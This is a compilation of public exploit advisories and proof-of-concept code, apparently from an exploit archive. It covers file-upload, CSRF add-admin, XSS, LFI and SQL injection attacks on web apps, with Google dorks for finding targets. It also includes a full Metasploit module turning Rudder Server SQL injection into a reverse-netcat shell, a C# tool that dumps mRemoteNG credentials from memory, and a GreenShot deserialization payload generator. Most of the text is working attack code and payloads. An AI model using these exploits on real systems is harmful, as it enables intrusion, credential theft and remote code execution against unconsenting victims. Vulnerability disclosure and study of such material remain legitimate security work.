<pre><code>====================================================================================================================================<br />| # Title : Codoforum v3.4 Arbitrary file upload Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) |<br />| # Vendor : https://codoforum.com/ |<br />| # Dork : "Powered by Codoforum" |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] suffers from an arbitrary file upload vulnerability.<br /><br />[+] Register new member .<br /><br />[+] go to edit your profil : http://127.0.0.1/qspa.co.uk/index.php?u=/user/profile/6/edit<br /><br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : CMSsite v1.0 privilege escalation Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0.1 (32-bit) |<br />| # Vendor : https://github.com/VictorAlagwu/CMSsite/archive/master.zip | <br />| # Dork : n/a |<br />====================================================================================================================================<br /><br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine .<br /><br />[+] First register a new member .<br /><br />[+] after login to your account automatically redirect you to admin panel. <br /><br />[+] Go To Edit your profile http://127.0.0.1/CMSsite-master/admin/profile.php?section=indoushka & Upload your Ev!l files<br /><br />[+] et voila http://127.0.0.1/CMSsite-master/img/csc.php<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : CMSUsina V2.2.3 CSRF Add Admin Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit) |<br />| # Vendor : http://www.ysy.com.br/ | <br />| # Dork : "Desenvolvido por Usina da Criação" |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] The following html code Edit admin .<br /><br />[+] Go to the line 3.<br /><br />[+] Set the target site link Save changes and apply . <br /><br />[+] infected file : site/adm/user.php.<br /><br />[+] http://127.0.0.1/site/adm/user.php<br /><br />[+] save code as poc.html .<br /><br /> <p>Alterar seus dados de acesso</p> <br /> <fieldset><legend>ALTERAR DADOS</legend> <br /> <form name="editsenha" method="post" action="http://rcborgesconstrutoracombr/site/adm/user.php?acao=edit"> <br /> <label><b>Usu&aacute;rio</b></label><br /> <br /> <input type="text" name="login" value="." maxlength="14" size="70" /><br /><br /> <label><br /> <b>Confirmar usu&aacute;rio</b></label><br /> <input type="text" name="login2" value="." maxlength="14" size="70" /><br /><br /> <br /> <label><b>Senha</b></label><br /> <input type="password" name="senha" value="." maxlength="14" size="70" /><br /><br /> <br /> <label><b>Confirmar senha</b></label><br /> <input type="password" name="senha2" value="." maxlength="14" size="70" /><br /><br /> <br /> <input type="submit" name="submit" value="Alterar senha" /> </form> </fieldset> <!-- fim conte?do --> </div> </td> </tr> <br /> </table> </body> </html> <br /><br />Greetings to :=================================================================<br />jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |<br />===============================================================================<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /> include Msf::Exploit::FileDropper<br /> include Msf::Exploit::Remote::HttpClient<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Rudder Server SQLI Remote Code Execution',<br /> 'Description' => %q{<br /> This Metasploit module exploits a SQL injection vulnerability in<br /> RudderStack's rudder-server, an open source Customer Data Platform (CDP).<br /> The vulnerability exists in versions of rudder-server prior to 1.3.0-rc.1.<br /> By exploiting this flaw, an attacker can execute arbitrary SQL commands,<br /> which may lead to Remote Code Execution (RCE) due to the `rudder` role<br /> in PostgreSQL having superuser permissions by default.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'Ege Balcı <egebalci@pm.me>' # msf module<br /> ],<br /> 'References' => [<br /> ['CVE', '2023-30625'],<br /> ['URL', 'https://securitylab.github.com/advisories/GHSL-2022-097_rudder-server/'],<br /> ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2023-30625'],<br /> ],<br /> 'DefaultOptions' => {<br /> 'SSL' => false,<br /> 'WfsDelay' => 5<br /> },<br /> 'Platform' => [ 'unix', 'linux' ],<br /> 'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],<br /> 'Targets' => [<br /> [<br /> 'Unix Command',<br /> {<br /> 'Platform' => %w[unix linux],<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :unix_cmd,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/unix/reverse_netcat'<br /> }<br /> }<br /> ],<br /> # Due to the insufficient build instructions for Windows platforms, no testing were done on this platform.<br /> # As a result, the target is disabled in this exploit module.<br /> # [<br /> # 'Windows Command',<br /> # {<br /> # 'Platform' => 'win',<br /> # 'Arch' => ARCH_CMD,<br /> # 'Type' => :win_cmd,<br /> # 'DefaultOptions' => {<br /> # 'PAYLOAD' => 'cmd/windows/powershell_reverse_netcat'<br /> # }<br /> # }<br /> # ],<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'Privileged' => false,<br /> 'DisclosureDate' => '2023-06-16',<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]<br /> }<br /> )<br /> )<br /><br /> register_options(<br /> [<br /> Opt::RPORT(8080),<br /> OptString.new('TARGETURI', [true, 'The URI of the Rudder API', '/']),<br /> ]<br /> )<br /> end<br /><br /> def check<br /> version = get_version<br /> return Exploit::CheckCode::Unknown if version.nil? || version == 'Unknown'<br /><br /> if Rex::Version.new('1.3.0-rc.1') > Rex::Version.new(version.gsub('v', ''))<br /> return Exploit::CheckCode::Appears("Rudder Version: #{version}")<br /> end<br /><br /> Exploit::CheckCode::Safe<br /> end<br /><br /> def get_version<br /> return @get_version if @get_version<br /><br /> res = send_request_cgi(<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, 'version')<br /> )<br /> if res && res.code == 200<br /> @get_version = res.get_json_document['Version']<br /> if @get_version.empty?<br /> @get_version = 'Unknown'<br /> end<br /><br /> @get_version<br /> end<br /> end<br /><br /> def exploit<br /> print_status "Detected rudder version: #{get_version}"<br /> # If not 'Auto' then use the selected version<br /> case target['Type']<br /> # when :win_cmd<br /> # shell = 'cmd.exe'<br /> when :unix_cmd<br /> shell = 'bash'<br /> else<br /> fail_with(Failure::BadConfig, 'Please select a valid target')<br /> end<br /><br /> data = "{\"source_id\": \"#{Rex::Text.rand_text_alpha(4..8)}'; copy (SELECT '#{payload.encoded}') to program '#{shell}'-- - \"}"<br /> print_status 'Triggering RCE via crafted SQL query...'<br /> send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, '/v1/warehouse/pending-events'),<br /> 'ctype' => 'application/json',<br /> 'data' => data<br /> })<br /> end<br />end<br /></code></pre>
<pre><code># Exploit Title: Joomla iProperty Real Estate 4.1.1 - Reflected XSS<br /># Exploit Author: CraCkEr<br /># Date: 29/07/2023<br /># Vendor: The Thinkery LLC<br /># Vendor Homepage: http://thethinkery.net<br /># Software Link: https://extensions.joomla.org/extension/vertical-markets/real-estate/iproperty/<br /># Demo: https://iproperty.thethinkery.net/<br /># Tested on: Windows 10 Pro<br /># Impact: Manipulate the content of the site <br /><br /><br />## Greetings<br /><br />The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka <br />CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /><br /><br />## Description<br /><br />The attacker can send to victim a link containing a malicious URL in an email or instant message<br />can perform a wide variety of actions, such as stealing the victim's session token or login credentials<br /><br /><br /><br />Path: /iproperty/property-views/all-properties-with-map<br /><br />GET parameter 'filter_keyword' is vulnerable to XSS<br /><br />https://website/iproperty/property-views/all-properties-with-map?filter_keyword=[XSS]&option=com_iproperty&view=allproperties&ipquicksearch=1<br /><br /><br />XSS Payload: pihil"onmouseover="alert(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"f63m4<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>========================================================================================================<br />| # Title : Codecanyon Bitcoin Tools Suite v1.0 LFI Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) | <br />| # Vendor : http://nitrogfx.com/74316-codecanyon-bitcoin-tools-suite-v10-50-features-20003097.html | <br />| # Dork : "Powerful bitcoin and cryptocurrency tools & tickers." |<br />========================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] infected file : index.php<br /><br /> line 4 : require_once('includes/templates/' . $website['template'] . '/header.php');<br /><br />[+] http://localhost/btcon/index.php?website['template'] = evil<br /><br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : CMVC SHOP LMS v 2.1.0 Sql injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 74.0(32-bit) | <br />| # Vendor : http://www.cmvcshop.com/ | <br />| # Dork : All rights reserved CMVC SHOP |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use Payload : product_detail.php?productid=%Inject_Here%106<br /><br />[+] http://127.0.0.1/cmvcshopcom/product_detail.php?productid=%Inject_Here%106<br /><br />[+] http://127.0.0.1/wwwcmvcshopcom/login.php<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code># Exploit Title: mRemoteNG v1.77.3.1784-NB - Cleartext Storage of Sensitive Information in Memory<br /># Google Dork: -<br /># Date: 21.07.2023<br /># Exploit Author: Maximilian Barz<br /># Vendor Homepage: https://mremoteng.org/<br /># Software Link: https://mremoteng.org/download<br /># Version: mRemoteNG <= v1.77.3.1784-NB<br /># Tested on: Windows 11<br /># CVE : CVE-2023-30367<br /><br /><br /><br /><br />/*<br />Multi-Remote Next Generation Connection Manager (mRemoteNG) is free software that enables users to<br />store and manage multi-protocol connection configurations to remotely connect to systems.<br /><br />mRemoteNG configuration files can be stored in an encrypted state on disk. mRemoteNG version <= v1.76.20 and <= 1.77.3-dev<br />loads configuration files in plain text into memory (after decrypting them if necessary) at application start-up,<br />even if no connection has been established yet. This allows attackers to access contents of configuration files in plain text<br />through a memory dump and thus compromise user credentials when no custom password encryption key has been set.<br />This also bypasses the connection configuration file encryption setting by dumping already decrypted configurations from memory.<br />Full Exploit and mRemoteNG config file decryption + password bruteforce python script: https://github.com/S1lkys/CVE-2023-30367-mRemoteNG-password-dumper<br />*/<br /><br /><br />using System;<br />using System.Collections;<br />using System.Collections.Generic;<br />using System.Diagnostics;<br />using System.IO;<br />using System.Reflection;<br />using System.Runtime.InteropServices;<br />using System.Text;<br />using System.Text.RegularExpressions;<br /><br /><br />namespace mRemoteNGDumper<br />{<br />public static class Program<br />{<br /><br />public enum MINIDUMP_TYPE<br />{<br />MiniDumpWithFullMemory = 0x00000002<br />}<br /><br />[StructLayout(LayoutKind.Sequential, Pack = 4)]<br />public struct MINIDUMP_EXCEPTION_INFORMATION<br />{<br />public uint ThreadId;<br />public IntPtr ExceptionPointers;<br />public int ClientPointers;<br />}<br /><br />[DllImport("kernel32.dll")]<br />static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId);<br /><br />[DllImport("Dbghelp.dll")]<br />static extern bool MiniDumpWriteDump(IntPtr hProcess, uint ProcessId, SafeHandle hFile, MINIDUMP_TYPE DumpType, ref MINIDUMP_EXCEPTION_INFORMATION ExceptionParam, IntPtr UserStreamParam, IntPtr CallbackParam);<br /><br /><br />static void Main(string[] args)<br />{<br />string input;<br />bool configfound = false;<br />StringBuilder filesb;<br />StringBuilder linesb;<br />List<string> configs = new List<string>();<br /><br />Process[] localByName = Process.GetProcessesByName("mRemoteNG");<br /><br />if (localByName.Length == 0) {<br />Console.WriteLine("[-] No mRemoteNG process was found. Exiting");<br />System.Environment.Exit(1);<br />}<br />string assemblyPath = Assembly.GetEntryAssembly().Location;<br />Console.WriteLine("[+] Creating a memory dump of mRemoteNG using PID {0}.", localByName[0].Id);<br />string dumpFileName = assemblyPath + "_" + DateTime.Now.ToString("dd.MM.yyyy.HH.mm.ss") + ".dmp";<br />FileStream procdumpFileStream = File.Create(dumpFileName);<br />MINIDUMP_EXCEPTION_INFORMATION info = new MINIDUMP_EXCEPTION_INFORMATION();<br /><br />// A full memory dump is necessary in the case of a managed application, other wise no information<br />// regarding the managed code will be available<br />MINIDUMP_TYPE DumpType = MINIDUMP_TYPE.MiniDumpWithFullMemory;<br />MiniDumpWriteDump(localByName[0].Handle, (uint)localByName[0].Id, procdumpFileStream.SafeFileHandle, DumpType, ref info, IntPtr.Zero, IntPtr.Zero);<br />procdumpFileStream.Close();<br /><br />filesb = new StringBuilder();<br />Console.WriteLine("[+] Searching for configuration files in memory dump.");<br />using (StreamReader reader = new StreamReader(dumpFileName))<br />{<br />while (reader.Peek() >= 0)<br />{<br />input = reader.ReadLine();<br />string pattern = @"(\<Node)(.*)(?=\/>)\/>";<br />Match m = Regex.Match(input, pattern, RegexOptions.IgnoreCase);<br />if (m.Success)<br />{<br />configfound = true;<br /><br />foreach (string config in m.Value.Split('>'))<br />{<br />configs.Add(config);<br />}<br />}<br /><br />}<br /><br />reader.Close();<br />if (configfound)<br />{<br />string currentDir = System.IO.Directory.GetCurrentDirectory();<br />string dumpdir = currentDir + "/dump";<br />if (!Directory.Exists(dumpdir))<br />{<br />Directory.CreateDirectory(dumpdir);<br />}<br /><br />string savefilepath;<br />for (int i =0; i < configs.Count;i++)<br />{<br />if (!string.IsNullOrEmpty(configs[i]))<br />{<br />savefilepath = currentDir + "\\dump\\extracted_Configfile_mRemoteNG_" + i+"_" + DateTime.Now.ToString("dd.MM.yyyy.HH.mm") + "_confCons.xml";<br />Console.WriteLine("[+] Saving extracted configuration file to: " + savefilepath);<br />using (StreamWriter writer = new StreamWriter(savefilepath))<br />{<br />writer.Write(configs[i]+'>');<br />writer.Close();<br />}<br />}<br />}<br />Console.WriteLine("[+] Done!");<br />Console.WriteLine("[+] Deleting memorydump file!");<br />File.Delete(dumpFileName);<br />Console.WriteLine("[+] To decrypt mRemoteNG configuration files and get passwords in cleartext, execute: mremoteng_decrypt.py\r\n Example: python3 mremoteng_decrypt.py -rf \""+ currentDir + "\\dump\\extracted_Configfile_mRemoteNG_0_" + DateTime.Now.ToString("dd.MM.yyyy.HH.mm") + "_confCons.xml\"" );<br />}<br />else<br />{<br />Console.WriteLine("[-] No configuration file found in memorydump. Exiting");<br />Console.WriteLine("[+] Deleting memorydump file!");<br />File.Delete(dumpFileName);<br />}<br />}<br />}<br />}<br />}<br /><br /></code></pre>
<pre><code># Exploit Title: GreenShot 1.2.10 - Insecure Deserialization Arbitrary Code Execution<br /># Date: 26/07/2023<br /># Exploit Author: p4r4bellum<br /># Vendor Homepage: https://getgreenshot.org<br /># Software Link: https://getgreenshot.org/downloads/<br /># Version: 1.2.6.10<br /># Tested on: windows 10.0.19045 N/A build 19045<br /># CVE : CVE-2023-34634<br />#<br /># GreenShot 1.2.10 and below is vulnerable to an insecure object deserialization in its custom *.greenshot format<br /># A stream of .Net object is serialized and inscureley deserialized when a *.greenshot file is open with the software<br /># On a default install the *.greenshot file extension is associated with the programm, so double-click on a*.greenshot file<br /># will lead to arbitrary code execution<br />#<br /># Generate the payload. You need yserial.net to be installed on your machine. Grab it at https://github.com/pwntester/ysoserial.net<br />./ysoserial.exe -f BinaryFormatter -g WindowsIdentity -c "calc" --outputpath payload.bin -o raw<br />#load the payload<br />$payload = Get-Content .\payload.bin -Encoding Byte<br /># retrieve the length of the payload<br />$length = $payload.Length<br /># load the required assembly to craft a PNG file<br />Add-Type -AssemblyName System.Drawing<br /># the following lines creates a png file with some text. Code borrowed from https://stackoverflow.com/questions/2067920/can-i-draw-create-an-image-with-a-given-text-with-powershell<br />$filename = "$home\poc.greenshot"<br />$bmp = new-object System.Drawing.Bitmap 250,61 <br />$font = new-object System.Drawing.Font Consolas,24 <br />$brushBg = [System.Drawing.Brushes]::Green <br />$brushFg = [System.Drawing.Brushes]::Black <br />$graphics = [System.Drawing.Graphics]::FromImage($bmp) <br />$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height) <br />$graphics.DrawString('POC Greenshot',$font,$brushFg,10,10) <br />$graphics.Dispose() <br />$bmp.Save($filename) <br /><br /># append the payload to the PNG file<br />$payload | Add-Content -Path $filename -Encoding Byte -NoNewline <br /># append the length of the payload<br />[System.BitConverter]::GetBytes([long]$length) | Add-Content -Path $filename -Encoding Byte -NoNewline<br /># append the signature<br />"Greenshot01.02" | Add-Content -path $filename -NoNewline -Encoding Ascii<br /># launch greenshot. Calc.exe should be executed<br />Invoke-Item $filename<br /><br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : CMSshop(ir) v1 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit) |<br />| # Vendor : https://codecanyon.net/item/pro-login-advanced-secure-php-user-management-system/12388905?s_rank=169 |<br />| # Dork : "Login - ProLogin" |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use payload : /shop-php/cart.php?new=28%22%20onmouseover%3dprompt(904251)%20bad%3d%22 <br /> /shop-php/product.php?productid=20&start=0%22%20onmouseover%3dprompt(961299)%20bad%3d%22 <br /> <br />[+] http://localhost/shop-php/cart.php?new=21%22%20%3Cmarquee%3E%3Cfont%20color=Blue%20size=32%3Eindoushka%3C/font%3E%3C/marquee%3E%22<br /><br />Greetings to :=================================================================<br />jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |<br />===============================================================================<br /></code></pre>